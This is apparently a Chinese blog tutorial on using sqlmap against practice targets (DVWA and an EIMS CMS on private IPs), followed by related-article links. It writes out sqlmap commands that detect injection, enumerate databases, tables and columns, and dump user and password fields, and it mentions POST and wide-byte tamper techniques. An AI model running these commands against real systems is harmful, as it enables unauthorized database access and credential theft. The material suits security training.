sqlmap测试靶机
测试SQL注入
Sqlmap.py -u "http://192.168.3.83/eims_cms_3.5/News.asp?SortID=1&ItemID=49"
可以从下面的测试结果看出此处存在SQL注入以及攻击类型和payload
获取数据库信息GET型
1. 获取数据库名字
sqlmap.py -u "http://192.168.3.3/DVWA/vulnerabilities/sqli/?i=1&Submit=Submit#" --cookie="security=low;PHPSESSID=3r6fqg0usr2fl6skonnpqnkes1"--current-db
得知数据库名字为:dvwa
2. 获取数据库表名
sqlmap.py -u "http://192.168.3.3/DVWA/vulnerabilities/sqli/?i=1&Submit=Submit#" --cookie="security=low;PHPSESSID=3r6fqg0usr2fl6skonnpqnkes1" -D dvwa --table
3. 获取字段名
sqlmap.py -u "http://192.168.3.3/DVWA/vulnerabilities/sqli/?i=1&Submit=Submit#" --cookie="security=low;PHPSESSID=3r6fqg0usr2fl6skonnpqnkes1" -D dvwa -T users --column
4. 获取字段值
//只读取某一或某几列sqlmap.py -u "http://192.168.3.3/DVWA/vulnerabilities/sqli/?i=1&Submit=Submit#" --cookie="security=low;PHPSESSID=3r6fqg0usr2fl6skonnpqnkes1" -D dvwa -T users -C user,password --dump//读取表中全部字段值Sqlmap.py -u “http://192.168.3.83/eims_cms_3.5/News.asp?SortID=1&ItemID=49” -D dvwa -T users --dump
获取数据库信息POST型
1. 抓包将信息复制到文件中
修改host以及将可以的地方可以标注星号
2. 语句
使用-r
3. 结果
宽字节注入
1. 抓包
发现使用普通命令跑不出来
加tamper试试
sqlmap测试靶机相关推荐
- 渗透测试-靶机打靶思路与方法
渗透测试-靶机打靶思路与方法 文章目录 渗透测试-靶机打靶思路与方法 一.对靶机进行信息收集 1.首先对目标存活靶机发起嗅探: 2.对目标主机开放端口及服务发起探测 3.对非web端口的服务发起迅速的 ...
- 全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(七)IMF【包含了sql注入,文件上传,gif图片木马制作,缓冲区溢出漏洞sploit等诸多知识点的靶机,超多干货】
靶机地址:https://www.vulnhub.com/entry/imf-1,162/ 靶机难度:中级(CTF) 靶机发布日期:2016年10月30日 靶机描述:欢迎使用" IMF&qu ...
- 看完这篇 教你玩转渗透测试靶机vulnhub——DC9
Vulnhub靶机DC9渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:SQL注入: ③:文件包含: ④: ...
- 看完这篇 教你玩转渗透测试靶机Vulnhub——The Planets:Mercury
Vulnhub靶机The Planets:Mercury渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:漏 ...
- docker 漏洞测试 靶机环境 靶机平台 vulhub vulapps 简介
在实际学习中,经常需要模拟不同的漏洞环境,而使用公网的实例的话,多多少少又存在一些风险,因此能搭建一个本地的模拟环境去测试漏洞是一个不错的方案.Docker是近两年来十分流行的开源容器引擎,因此也出现 ...
- 看完这篇 教你玩转渗透测试靶机vulnhub——DC1
Vulnhub靶机DC1渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:漏洞发现: ③:漏洞利用: ④:S ...
- 看完这篇 教你玩转渗透测试靶机——Metasploitable2
Metasploitable2渗透测试详解 Metasploitable2靶机介绍: Metasploitable2靶机下载: Metasploitable2靶机安装: Metasploitable2 ...
- 看完这篇 教你玩转渗透测试靶机vulnhub——DC3
Vulnhub靶机DC3渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:漏洞发现: ③:SQL注入: ④: ...
- 看完这篇 教你玩转渗透测试靶机vulnhub——DC7
Vulnhub靶机DC7渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:SSH登入: ③:漏洞发现与利用: ...
最新文章
- mysql 添加索引
- 【BZOJ1951】【SDOI2010】古代猪文 Lucas定理、中国剩余定理、exgcd、费马小定理
- sql 截取_如何用 SQL 找一个女朋友?
- form表单上传文件_SpringBoot中如何使用SpringMVC上传文件?
- Tomcat启动时项目重复加载,导致资源初始化两次的问题
- shell脚本中if流程控制语句的应用
- 【状压dp】AC Challenge
- 计算机组成原理白中英第五版之指令系统
- 论文中的Matlab画图常用技巧
- doc 问卷调查模板表_调查问卷范文调查问卷模板.doc
- java 多线程课件_Thread_java多线程参考源码_ppt_大学课件预览_高等教育资讯网
- 推荐一个好用的 sqlite 管理器 sqliteman 感觉比 navicat 好用
- 锂电池充电原理:充电电压电流的选择方法
- (Android) 日志打印 Log的使用
- stm32驱动TFTLCD液晶屏显示图片+汉字(快速上手,只教怎么用,不讲原理!)
- 软件工程师为什么单身的六宗罪
- java 为pdf添加水印图片
- summernote 添加emoji表情包
- ChatGPT会对未来5年的NLP算法从业者带来怎样的冲击?
- 如何利用python进行一次移动平均预测
热门文章
- Python爬取福利图要在中午,因为早晚会出事!我才存了2000文件夹
- 3G、WiFi、WLAN、蓝牙、zigbee区别
- 3dmip12小时内无法注册_国内用户将无法再注册Steam新账号
- 《云计算》 刘鹏 第二版 第三版 PDF
- 【C++练习】4.1假设有三家银行:中国银行BOC、工商银行ICBC和农业银行ABC
- 微信小程序云开发项目实战进阶 - 诗词大全成语接龙
- 实战saas系统多租户数据隔离(三)每个租户使用独立的表空间
- html accordion折叠菜单动态,jQuery EasyUI 布局插件 – Accordion 折叠面板 | 菜鸟教程...
- Matlab安装下载的工具箱
- ie不支持html56,是否浏览器设置有问题?